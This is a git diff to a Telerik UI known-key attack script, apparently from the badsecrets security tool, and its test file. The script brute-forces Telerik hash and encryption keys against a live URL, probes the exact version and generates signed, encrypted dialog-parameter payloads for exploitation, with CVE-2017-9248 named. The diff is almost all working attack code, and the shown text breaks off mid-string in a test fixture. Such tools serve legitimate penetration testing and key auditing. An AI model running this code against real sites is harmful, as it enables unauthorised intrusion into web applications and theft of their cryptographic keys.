diff --git a/badsecrets/examples/telerik_knownkey.py b/badsecrets/examples/telerik_knownkey.py index 4f10e786..969703e2 100755 --- a/badsecrets/examples/telerik_knownkey.py +++ b/badsecrets/examples/telerik_knownkey.py @@ -138,34 +138,55 @@ def validate_url( ] telerik_versions_patched = [ - "2022.3.1109", - "2022.3.913", - "2022.2.622", - "2022.2.511", - "2022.1.302", - "2022.1.119", - "2021.3.1111", - "2021.3.914", - "2021.2.616", - "2021.2.511", - "2021.1.330", - "2021.1.224", - "2021.1.119", - "2020.3.1021", - "2020.3.915", - "2020.2.617", - "2020.2.512", - "2020.1.219", - "2020.1.114", - "2019.3.1023", - "2019.3.917", - "2019.2.514", - "2019.1.215", - "2019.1.115", - "2018.3.910", - "2018.2.710", - "2018.2.516", "2018.1.117", + "2018.2.516", + "2018.2.710", + "2018.3.910", + "2019.1.115", + "2019.1.215", + "2019.2.514", + "2019.3.917", + "2019.3.1023", + "2020.1.114", + "2020.1.219", + "2020.2.512", + "2020.2.617", + "2020.3.915", + "2020.3.1021", + "2021.1.119", + "2021.1.224", + "2021.1.330", + "2021.2.511", + "2021.2.616", + "2021.3.914", + "2021.3.1111", + "2022.1.119", + "2022.1.302", + "2022.2.511", + "2022.2.622", + "2022.3.913", + "2022.3.921", + "2022.3.1109", + "2023.1.117", + "2023.1.314", + "2023.1.323", + "2023.1.425", + "2023.2.606", + "2023.2.718", + "2023.2.829", + "2023.3.1010", + "2023.3.1114", + "2024.1.130", + "2024.1.312", + "2024.1.319", + "2024.2.513", + "2024.2.514", + "2024.3.806", + "2024.3.924", + "2024.3.1015", + "2024.4.1112", + "2024.4.1113", + "2024.4.1114", ] @@ -272,19 +293,46 @@ def select_derive_algos(version): def solve_key(self): reported_early_indicator = False - for telerik_version in chain(telerik_versions, telerik_versions_patched): - print(telerik_version) - hashkeys = ( - ["dummyvalue"] - if int(telerik_version[:4]) < 2017 - else self.telerik_hashkey.prepare_keylist(include_machinekeys=self.include_machinekeys_bool) - ) + # If a specific version was provided via command line, only test that version + if hasattr(self, "version") and self.version: + versions_to_test = [self.version] + else: + versions_to_test = chain(telerik_versions, telerik_versions_patched) + + for telerik_version in versions_to_test: + if hasattr(self, "debug") and self.debug: + print(f"\n[DEBUG] Testing Telerik version: {telerik_version}") + else: + print(telerik_version) + + # If custom keys are provided, use only those + if hasattr(self.telerik_hashkey, "custom_keys"): + hashkeys = ["dummyvalue"] if int(telerik_version[:4]) < 2017 else [self.telerik_hashkey.custom_keys[1]] + else: + hashkeys = ( + ["dummyvalue"] + if int(telerik_version[:4]) < 2017 + else self.telerik_hashkey.prepare_keylist(include_machinekeys=self.include_machinekeys_bool) + ) + for hashkey in hashkeys: - for key in self.telerik_encryptionkey.prepare_keylist( - include_machinekeys=self.include_machinekeys_bool - ): + # If custom keys are provided, use only those + if hasattr(self.telerik_encryptionkey, "custom_keys"): + keys_to_try = [self.telerik_encryptionkey.custom_keys[0]] + else: + keys_to_try = self.telerik_encryptionkey.prepare_keylist( + include_machinekeys=self.include_machinekeys_bool + ) + + for key in keys_to_try: derive_algos = self.select_derive_algos(telerik_version) for derive_algo in derive_algos: + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Testing combination:") + print(f" - Version: {telerik_version}") + print(f" - Hash Key: {hashkey}") + print(f" - Encryption Key: {key}") + print(f" - Derive Algorithm: {derive_algo}") if derive_algo == "PBKDF1_MS": derived_key, iv = self.telerik_encryptionkey.telerik_derivekeys_PBKDF1_MS(key) elif derive_algo == "PBKDF2": @@ -299,7 +347,11 @@ def solve_key(self): f"multipart/form-data; boundary=---------------------------{multipart_boundary}" ) request.headers.update(self.headers) + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Sending request to: {self.url}") resp = session.send(request, verify=False) + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Response status: {resp.status_code}") if "Could not load file or assembly" in resp.text: if reported_early_indicator == False: print( @@ -319,7 +371,7 @@ def solve_key(self): class DialogHandler: - def __init__(self, url, include_machinekeys_bool=False, proxies={}, headers=None): + def __init__(self, url, modern_dialog_params=False, include_machinekeys_bool=False, proxies={}, headers=None): self.url = url self.telerik_hashkey = Telerik_HashKey() self.telerik_encryptionkey = Telerik_EncryptionKey() @@ -330,30 +382,82 @@ def __init__(self, url, include_machinekeys_bool=False, proxies={}, headers=None self.proxies = proxies self.headers = headers self.include_machinekeys_bool = include_machinekeys_bool + self.modern_dialog_params = modern_dialog_params + + def probe_version_baseline(self): + # Get baseline with bogus version + b64section_plain = f"Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version=9999.9.999, Culture=neutral, PublicKeyToken=121fae78165ba3d4" + b64section = base64.b64encode(b64section_plain.encode()).decode() + + if hasattr(self, "modern_dialog_params") and self.modern_dialog_params: + plaintext = f"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;StyleManagerProperties,False,0,;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,5000000;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ScriptManagerProperties,False,0,CkZhbHNlCgoKRmFsc2UKMAoKCgo=;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};AllowMultipleSelection,False,3,True" + else: + plaintext = f"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};AllowMultipleSelection,False,3,False" + + derivedKey, derivedIV = self.telerik_encryptionkey.telerik_derivekeys( + self.encryption_key, self.key_derive_mode + ) + ct = self.telerik_encryptionkey.telerik_encrypt(derivedKey, derivedIV, plaintext) + dialog_parameters = self.telerik_hashkey.sign_enc_dialog_params(self.hash_key, ct) + r = requests.post( + self.url, + data={"dialogParametersHolder": dialog_parameters}, + headers=self.headers, + verify=False, + proxies=self.proxies, + ) + return len(r.text) + + def probe_version(self, version, baseline_size=None): + if hasattr(self, "debug") and self.debug: + print(f"\n[DEBUG] Probing version: {version}") - def probe_version(self, version): b64section_plain = f"Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version={version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4" b64section = base64.b64encode(b64section_plain.encode()).decode() - plaintext = f"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};AllowMultipleSelection,False,3,False" + + if hasattr(self, "modern_dialog_params") and self.modern_dialog_params: + plaintext = f"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;StyleManagerProperties,False,0,;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,5000000;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ScriptManagerProperties,False,0,CkZhbHNlCgoKRmFsc2UKMAoKCgo=;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};AllowMultipleSelection,False,3,True" + else: + plaintext = f"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};AllowMultipleSelection,False,3,False" + derivedKey, derivedIV = self.telerik_encryptionkey.telerik_derivekeys( self.encryption_key, self.key_derive_mode ) ct = self.telerik_encryptionkey.telerik_encrypt(derivedKey, derivedIV, plaintext) dialog_parameters = self.telerik_hashkey.sign_enc_dialog_params(self.hash_key, ct) - dialog_parameters_data = {"dialogParametersHolder": dialog_parameters} r = requests.post( - self.url, data=dialog_parameters_data, headers=self.headers, verify=False, proxies=self.proxies + self.url, + data={"dialogParametersHolder": dialog_parameters}, + headers=self.headers, + verify=False, + proxies=self.proxies, ) - if r.status_code != 500: - print(version) - if r.status_code == 200: + + # Extract title if it exists + title = "" + if r.text: + title_match = re.search(r"([^<]+)", r.text, re.IGNORECASE) + if title_match: + title = f" {title_match.group(1).strip()}" + + if hasattr(self, "debug") and self.debug: + print( + f"Attempting to probe version: {version}. Got response code [{r.status_code}] with size {len(r.text)} {title}" + ) + if baseline_size and abs(len(r.text) - baseline_size) > 10: return dialog_parameters + return None def detect_derive_function(self): self.key_derive_mode = "PBKDF1_MS" KDF_probe_data = {"dialogParametersHolder": "AAAA"} + if hasattr(self, "debug") and self.debug: + print("\n[DEBUG] Detecting key derivation function") + print(f"[DEBUG] Sending probe request to: {self.url}") res = requests.post(self.url, data=KDF_probe_data, proxies=self.proxies, headers=self.headers, verify=False) resp_body = res.text + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Response status: {res.status_code}") if ( "Exception of type 'System.Exception' was thrown" in resp_body @@ -377,40 +481,64 @@ def detect_derive_function(self): print("Target is a valid DialogHandler endpoint. Brute forcing Telerik Hash Key...") def solve_key(self): + print("\n=== KEY DISCOVERY ===") # PBKDF1_MS MODE if self.key_derive_mode == "PBKDF1_MS": hashkey_counter = 0 - for hash_key_probe, hash_key in self.telerik_hashkey.hashkey_probe_generator( - include_machinekeys=self.include_machinekeys_bool - ): + # If custom keys are provided, use only those + if hasattr(self.telerik_hashkey, "custom_keys"): + hashkey_generator = [(self.telerik_hashkey.custom_keys[1], self.telerik_hashkey.custom_keys[1])] + else: + hashkey_generator = self.telerik_hashkey.hashkey_probe_generator( + include_machinekeys=self.include_machinekeys_bool + ) + + for hash_key_probe, hash_key in hashkey_generator: hashkey_counter += 1 data = {"dialogParametersHolder": hash_key_probe} res = requests.post(self.url, data=data, proxies=self.proxies, headers=self.headers, verify=False) + if hasattr(self, "debug") and self.debug: + print(f"\n[DEBUG] Testing hash key #{hashkey_counter}: {hash_key}") + print(f"[DEBUG] Sending request to: {self.url}") + resp_body = urllib.parse.unquote(res.text) + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Response status: {res.status_code}") print(f"Tested {hashkey_counter} hash keys so far...") if hashkey_counter % 1000 == 0 else None if "The input data is not a complete block" in resp_body: - print(f"Found matching hashkey! [{hash_key}]") - + print(f"\nSUCCESS! Found matching hashkey: [{hash_key}]") self.hash_key = hash_key break elif "The input is not a valid Base-64 string" in resp_body: - print("The target appears to be a pre-2017 version, and does not have a hash key.") - print("This means it should be vulnerable to CVE-2017-9248!!!") + print("\nTarget appears to be a pre-2017 version without hash key (CVE-2017-9248)") return if self.hash_key: - print("Since we found a valid hash key, we can check for known Telerik Encryption Keys") + print("\nNow checking for known Telerik Encryption Keys...") encryptionkey_counter = 0 - for encryption_key_probe, encryption_key in self.telerik_encryptionkey.encryptionkey_probe_generator( - hash_key, self.key_derive_mode, include_machinekeys=self.include_machinekeys_bool - ): + # If custom keys are provided, use only those + if hasattr(self.telerik_encryptionkey, "custom_keys"): + encryptionkey_generator = [ + (self.telerik_encryptionkey.custom_keys[0], self.telerik_encryptionkey.custom_keys[0]) + ] + else: + encryptionkey_generator = self.telerik_encryptionkey.encryptionkey_probe_generator( + hash_key, self.key_derive_mode, include_machinekeys=self.include_machinekeys_bool + ) + + for encryption_key_probe, encryption_key in encryptionkey_generator: encryptionkey_counter += 1 data = {"dialogParametersHolder": encryption_key_probe} + if hasattr(self, "debug") and self.debug: + print(f"\n[DEBUG] Testing encryption key #{encryptionkey_counter}: {encryption_key}") + print(f"[DEBUG] Sending request to: {self.url}") res = requests.post(self.url, data=data, proxies=self.proxies, headers=self.headers, verify=False) + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Response status: {res.status_code}") ( print(f"Tested {encryptionkey_counter} encryption keys so far...") @@ -419,75 +547,140 @@ def solve_key(self): ) if "Index was outside the bounds of the array" in res.text: - print(f"Found Encryption key! [{encryption_key}]") + print(f"\nSUCCESS! Found encryption key: [{encryption_key}]") self.encryption_key = encryption_key break if self.encryption_key == None: - print("Could not identify encryption key.") + print("\nFAILED: Could not identify encryption key.") return else: - print("Could not identify hash key.") + print("\nFAILED: Could not identify hash key.") return elif self.key_derive_mode == "PBKDF2": if self.include_machinekeys_bool: print( - "Warning: MachineKeys inclusion mode is enabled, which affects this Telerik version particularly dramatically. Brute Forcing will be VERY SLOW" + "\nWARNING: MachineKeys inclusion mode is enabled, which affects this Telerik version particularly dramatically. Brute Forcing will be VERY SLOW" ) print("Try without the MachineKeys first!") - print("About to bruteforce hash key and encryption key combinations...") + print("\nBrute forcing hash key and encryption key combinations...") + + # Get baseline response first + plaintext = "EnableAsyncUpload,False,3,True;AllowMultipleSelection,False,3,False" + derivedKey, derivedIV = self.telerik_encryptionkey.telerik_derivekeys("dummy", self.key_derive_mode) + ct = self.telerik_encryptionkey.telerik_encrypt(derivedKey, derivedIV, plaintext) + dialog_parameters = self.telerik_hashkey.sign_enc_dialog_params("dummy", ct) + data = {"dialogParametersHolder": dialog_parameters} + baseline_res = requests.post(self.url, data=data, proxies=self.proxies, headers=self.headers, verify=False) + baseline_size = len(baseline_res.text) + baseline_status = baseline_res.status_code + + if hasattr(self, "debug") and self.debug: + print(f"\n[DEBUG] Baseline response size: {baseline_size} bytes") + print(f"[DEBUG] Baseline status code: {baseline_status}") + count = 0 - for hash_key in self.telerik_hashkey.prepare_keylist(include_machinekeys=self.include_machinekeys_bool): - for encryption_key_probe, encryption_key in self.telerik_encryptionkey.encryptionkey_probe_generator( - hash_key, self.key_derive_mode, include_machinekeys=self.include_machinekeys_bool - ): + + # If custom keys are provided, use only those + if hasattr(self.telerik_hashkey, "custom_keys"): + hashkeys = [self.telerik_hashkey.custom_keys[1]] + else: + hashkeys = self.telerik_hashkey.prepare_keylist(include_machinekeys=self.include_machinekeys_bool) + + for hash_key in hashkeys: + # If custom keys are provided, use only those + if hasattr(self.telerik_encryptionkey, "custom_keys"): + encryptionkey_generator = [ + (self.telerik_encryptionkey.custom_keys[0], self.telerik_encryptionkey.custom_keys[0]) + ] + else: + encryptionkey_generator = self.telerik_encryptionkey.encryptionkey_probe_generator( + hash_key, self.key_derive_mode, include_machinekeys=self.include_machinekeys_bool + ) + + for encryption_key_probe, encryption_key in encryptionkey_generator: count += 1 - data = {"dialogParametersHolder": encryption_key_probe} + # For PBKDF2, we need to properly encrypt and hash the parameters + derivedKey, derivedIV = self.telerik_encryptionkey.telerik_derivekeys( + encryption_key, self.key_derive_mode + ) + + # Use a simple dummy payload for key discovery + plaintext = "EnableAsyncUpload,False,3,True;AllowMultipleSelection,False,3,False" + + ct = self.telerik_encryptionkey.telerik_encrypt(derivedKey, derivedIV, plaintext) + dialog_parameters = self.telerik_hashkey.sign_enc_dialog_params(hash_key, ct) + data = {"dialogParametersHolder": dialog_parameters} + if hasattr(self, "debug") and self.debug: + print(f"\n[DEBUG] Testing combination #{count}:") + print(f" - Hash Key: {hash_key}") + print(f" - Encryption Key: {encryption_key}") + print(f"[DEBUG] Sending request to: {self.url}") res = requests.post(self.url, data=data, proxies=self.proxies, headers=self.headers, verify=False) - if "Index was outside the bounds of the array" in res.text: - print(f"Found Encryption key! [{encryption_key}]") - print(f"Found matching hashkey! [{hash_key}]") + # Extract title if it exists + title = "" + if res.text: + title_match = re.search(r"([^<]+)", res.text, re.IGNORECASE) + if title_match: + title = f" {title_match.group(1).strip()}" + + response_size = len(res.text) + size_diff = abs(response_size - baseline_size) + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Response: [{res.status_code}]{title}") + print(f"[DEBUG] Response size: {response_size} bytes (diff: {size_diff} bytes)") + + # Detect significant change from baseline (more than 10 bytes different) + if size_diff > 10: + print(f"\nSUCCESS! Found encryption key: [{encryption_key}]") + print(f"SUCCESS! Found matching hashkey: [{hash_key}]") self.encryption_key = encryption_key self.hash_key = hash_key - break + return True - ( - print(f"Tested {count} hash key / encryption key combinations so far...") - if count % 1000 == 0 - else None - ) - - if self.hash_key: - break + (print(f"Tested {count} combinations so far...") if count % 1000 == 0 else None) if self.hash_key and self.encryption_key: + print("\nSuccessfully found both keys!") return True else: - print("Did not find hashkey / encryption key. Exiting.") + print("\nFAILED: Did not find hashkey / encryption key. Exiting.") + return False def solve_version(self): - print( - "Both encryption key and hash key were found: attempting to brute-force Telerik UI version and generate exploitation payload" - ) + print("\n=== VERSION PROBING ===") + print("Keys found! Now attempting to find the exact Telerik UI version...") + + baseline_size = self.probe_version_baseline() versions = [] - for v in telerik_versions + telerik_versions_patched: - versions.append(v) - undotted_versions = [] - for v in telerik_versions: - undotted_versions.append(re.sub(r"\.(?=\d+$)", "", v)) - versions += undotted_versions + # If version specified, only test that version + if hasattr(self, "version") and self.version: + versions = [self.version] + else: + # Otherwise test all versions + for v in telerik_versions + telerik_versions_patched: + versions.append(v) + undotted_versions = [] + for v in telerik_versions: + undotted_versions.append(re.sub(r"\.(?=\d+$)", "", v)) + versions += undotted_versions for version in versions: - dialog_parameters = self.probe_version(version) + dialog_parameters = self.probe_version(version, baseline_size) if dialog_parameters: self.version = version self.dialog_parameters = dialog_parameters + print(f"\nSUCCESS! Found working version: {version}") return True + print("\nFAILED: Could not find a working version despite having valid keys.") + print("This might indicate the target is using a custom/unknown version.") + return False + def main(): parser = argparse.ArgumentParser() @@ -521,19 +714,50 @@ def main(): help="Force enumeration of vulnerable AsyncUpload endpoint without user confirmation", action="store_true", ) + + parser.add_argument( + "-v", + "--version", + help="Specify a custom Telerik version to test", + ) + + parser.add_argument( + "-c", + "--custom-keys", + help="Specify custom keys in format 'encryptionkey,hashkey'. When provided, only these keys will be tested.", + ) + + parser.add_argument( + "-d", "--debug", help="Enable debug mode to show detailed request information", action="store_true" + ) + + parser.add_argument( + "--modern-dialog-params", + help="Use modern dialog parameters format (for newer Telerik versions 2018+)", + action="store_true", + ) + args = parser.parse_args() if not args.url: return + if args.debug: + print("\n=== DEBUG MODE ENABLED ===") + print("Will show detailed information about each request and key combination being tested") + print("This will generate a lot of output!\n") + + if args.proxy: + proxies = {"http": args.proxy, "https": args.proxy} + else: + proxies = {} + include_machinekeys_bool = False if args.machine_keys: include_machinekeys_bool = True print("MachineKeys inclusion enabled. Bruteforcing will take SIGNIFICANTLY longer") - proxies = None - if args.proxy: - proxies = {"http": args.proxy, "https": args.proxy} + # If version specified, only test that version headers = {} if args.user_agent: @@ -564,12 +788,26 @@ def main(): headers=headers, include_machinekeys_bool=include_machinekeys_bool, ) + if args.custom_keys: + try: + encryption_key, hash_key = args.custom_keys.split(",") + rau.telerik_encryptionkey.custom_keys = (encryption_key, hash_key) + rau.telerik_hashkey.custom_keys = (encryption_key, hash_key) + print(f"Using custom keys - Encryption Key: {encryption_key}, Hash Key: {hash_key}") + print("Only testing provided custom keys...") + except ValueError: + print("Error: Custom keys must be provided in format 'encryptionkey,hashkey'") + return rau.version_probe() if not args.force: response = input("Ready to attempt brute-force, press enter to continue...") if response.lower() != "": print("aborting...") sys.exit(2) + if args.version: + print(f"Testing specified version: {args.version}") + rau.version = args.version + rau.debug = args.debug rau.solve_key() return @@ -588,9 +826,28 @@ def main(): print(f"Confirmed target is Telerik UI DialogHandler") dh = DialogHandler( - args.url, proxies=proxies, headers=headers, include_machinekeys_bool=include_machinekeys_bool + args.url, + modern_dialog_params=args.modern_dialog_params, + proxies=proxies, + headers=headers, + include_machinekeys_bool=include_machinekeys_bool, ) + if args.custom_keys: + try: + encryption_key, hash_key = args.custom_keys.split(",") + dh.telerik_encryptionkey.custom_keys = (encryption_key, hash_key) + dh.telerik_hashkey.custom_keys = (encryption_key, hash_key) + print(f"Using custom keys - Encryption Key: {encryption_key}, Hash Key: {hash_key}") + print("Only testing provided custom keys...") + except ValueError: + print("Error: Custom keys must be provided in format 'encryptionkey,hashkey'") + return + dh.debug = args.debug + dh.modern_dialog_params = args.modern_dialog_params dh.detect_derive_function() + if args.version: + print(f"Testing specified version: {args.version}") + dh.version = args.version if dh.solve_key(): print("solved key!") if dh.solve_version(): diff --git a/tests/examples_telerik_knownkey_test.py b/tests/examples_telerik_knownkey_test.py index e1b1ed08..52f3a135 100644 --- a/tests/examples_telerik_knownkey_test.py +++ b/tests/examples_telerik_knownkey_test.py @@ -103,7 +103,7 @@ def asyncupload_found_key_matcher_PBKDF1_MS_incorrect(request): def PBKDF2_found_key_matcher(request): if ( request.body - == "dialogParametersHolder=Ct3E%2FAXZ0ct05hNqzzSbCRVxte%2F%2BQBIVbVz21p21CqLSnQsGfzTjsiq%2FxoAQaaDuaafBKu8cNXMOGT5kJcE0snNDBVbQqvbQLEYa1cWQYr%2FL2tOMq8Rnuzq6F7HKpN2%2BP0tdCPxrO3s6K2W43kvEO5wyaDlijlF9r2XI6UL1FUk%3D" + == "dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rFGZylxNlfmCxZEQFLAyV2xh%2FkGVb%2Bk95TQYnppybCMfuwinH7NDbVXKO7qr3kTNUCkgUUdFGWw6%2BoM49hkD%2BwQN%2F62S%2F%2BfVkxGJeRQEKHakLELFYpjwgW6UsXXDGmQilTdKx4iZ1MlO3JsD%2FWMUF94bACEiq26YUKhW7j0MEChv4regUuWBhAvrq0WKEdRbk%3D" ): return True return False @@ -112,7 +112,7 @@ def PBKDF2_found_key_matcher(request): def PBKDF2_found_key_matcher_negative(request): if ( request.body - == "dialogParametersHolder=Ct3E%2FAXZ0ct05hNqzzSbCRVxte%2F%2BQBIVbVz21p21CqLSnQsGfzTjsiq%2FxoAQaaDuaafBKu8cNXMOGT5kJcE0snNDBVbQqvbQLEYa1cWQYr%2FL2tOMq8Rnuzq6F7HKpN2%2BP0tdCPxrO3s6K2W43kvEO5wyaDlijlF9r2XI6UL1FUk%3D" + == "dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rFGZylxNlfmCxZEQFLAyV2xh%2FkGVb%2Bk95TQYnppybCMfuwinH7NDbVXKO7qr3kTNUCkgUUdFGWw6%2BoM49hkD%2BwQN%2F62S%2F%2BfVkxGJeRQEKHakLELFYpjwgW6UsXXDGmQilTdKx4iZ1MlO3JsD%2FWMUF94bACEiq26YUKhW7j0MEChv4regUuWBhAvrq0WKEdRbk%3D" ): return False return True @@ -120,9 +120,8 @@ def PBKDF2_found_key_matcher_negative(request): def PBKDF2_version_probe_matcher(request): if ( - request.body != "dialogParametersHolder=AAAA" - and request.body - == "dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rMO8kcLDRdffFhFXmvAr0o%2F4x%2B9VoRJVaOyGLXk2nhX4OMP%2BjGP2C96Fa6LyfGWHlk1CF0E5mAPeQ6CLbycR88WU5hlmUUqniXC2UdeYd6HO9RFnISEnhq72MkdiEfvNsqAhr2XaCX2%2BQxFXfCLi2%2Fc%2Bn2NmUiFRdhCLutnVxILEnYiRmU5eHJdB2IOTtoc2XZ3NUdZJwrwOswjzCkk7LOwt2bddTvOXdfWtRrbNz1GDNXlPz1cXotgAhucxLLsknNDbeeboMbL%2Bk3tIeervi7oI%2FRQn6Ml3ffUAfcqHzwcZCEIlQXh%2FBEIKHAY9fGKs5JSdtRbREDI0rh9sH%2B0TmYv444WQyqYpa8pOqtxgC1QRRcsNQcVGFzpyNL2SfKSlLTZi5Q7bo8XMTfLG6jg60csDEDiJ7MwJBGIm1iYzt%2FP9JEKkZujTMyHoBI0RESNpux7BeanEIDsfDmfwbcUo%2B2%2BkoHkCE4zXWBdW3lqssk4GwSbc0mbmf3U79rsQdNEqIOL87evE1U6tGB5PuXgwAIj9sKdyffd8%2B%2Bz1CCffFovLM72ilbCmSljAJ%2BvVBfNpTiL7RV7j3XGygljzi4NL8yXJuCLYiNxmqPMdV8DahLed0jSe2mkU1u6rx4yS3dcWEfwMWjI5tVrfnbqtdInC8TliXkTZ919CtORoydmIXGL1u3kdBIq8EZcjRMa4bN4VTvUlbqeIe8p8QYEQwAi7vXiZCKS6R6dmJfQv%2B%2FqBHXWSFuglLYde019GNtNdGQfEnY31zT0Q86ieDYn4k55LbYq5lK8PNjg50gdJxn9fNtHTQ7frKP9vRM4cImRSvDBTATVw1PDzMqn0exo3xciYd5%2BXYAxlFoqwFMDz40w2xR4OWwoPsixpVjR2DYiqYiZrYytFMjziRCLQhkVuJpED8nB9CTlo05WBKN%2Bb4UBHBg%2FkCkHXJxNakIX7UbAjDcqzrNCGhjrgehCGA81uOf0Ppfswda0ZHMi8g9W6Y7uwWmn7Ux7xBMgDCUNIi8I3UvLGXdKnuB8YHX8TLC1z2%2Fm3ip797Pix1ya2sBsbw9KgOJ7PBT0u9W0puchi7zpT%2FzFe3V2HbV0ottDethRJhzaN856VgvjyNhbbmA04gnal%2Fq01j7LNWxEwTjNPyHORI1l9jztvYqItLei7YQYg2pFhmvuv0Od8DPfH40Y1m3mL2F2d%2FAy3ImzFI%2BKQB6mnGPvRcDIS1j7zPhciKRuLfu3dCxhIH7ojo83rhQus3SyXdyZ5cjkFKcG3H7WmBBMOFs2o5xjWcdLARevRbNbqwRfATerc5GuJxy1Qb8RJvOqhDcS5YAHyxVMx2QYU3yMhg0tCpy4wW%2FHsa33feu3NeBu9lRI38ojJNM7o6xYRoSTQu4tYadB4Yh4w60e%2FsttnecOC5plZrLw6BYN2piqvUD07BnO4yTvrpdBDXR%2BMFDchnFh2YK9JtvvtAISvpoSOJojOhwRKuafCwEJn0GB1dsdmOOxxaFHkPXQ7789eCxlTL5mkVf3ktzmHQdDyBxBlDLFWSjmFIBHp%2BPobFdDOmv5p6J3%2F%2FM23PMgGDLRMrj5LVZV3trGV1ZaJHEFIGmVwW0tN4426Q4rCdcxT4ju%2B%2FNhcq90e8crWw9nrF2rPTzW1YM7VqWWwhLj8MtVtGZFa3N%2FxdjEys8FWyT8VqAbC4IltuT5lW1ou1SXsA96h%2F9y3vzJADbm4Lv624OGnh6M%2FCmR930i6YeUlWWmMw1%2FpcZ5werHPm9v0OWulNmGfbNEoKuThz2sSCZ8FLNVToygv1VXPXnur4dJnoCkwBP2%2BQQ6%2FHlyFRXnrrGsiDJE3qtRXgECIhc2zpuC5HAz9FhIfC9VZZ5nxRMbhA6W%2Fz%2BjPpKLCBpmLqHJfy8%2B%2FausiZJv7d9yQ0SvHtq0y%2FSY04hOgZTJul6IIYpObD6s%2FqrGy2nMmY3%2FtEn830%2F%2BFERnXMeBsj%2B%2F5ZSewYe4xBnub1wvSbsA3qjoU5gq7fhDJOhmMQXkbas%2FRholsU9CNKNXpSyqVarqAc8XwaG34JmdG3wjQXd6p%2Bz2jZLew5ja8nelvVdIeN%2F9ejCNOoXcPApYLHyxslcrEuJrSHlAMR4FbonfrFhYYTR%2B8pdxRGYGpVUDxlIRvay5xE4PoiuJ4tF82nhc3kr%2FsJWj86DXt9uK%2FPIDMokhA1wZ2BS8rN8V8J43gXMVkQtHFyqiAMoKttVwox3GtbTdmzYcjtjdZmL3VB27giGRreZsDbr6lsLJKVYnGtzAwL1nb45fLFtBNpiGXKHwE0soY3dapt%2FwadcvpFryVyG%2BesgLUwLWjgGepMMbQgPgi7Lk9TDgl5pO9Sg2%2B%2BCDEKkhmknkE%2FW4zr%2FbE3Qg97NK3hkIC0ajQvysQCsD2G98NREwRp5Yo2qUVqoKsz%2BM5FifnHVivHtbpB%2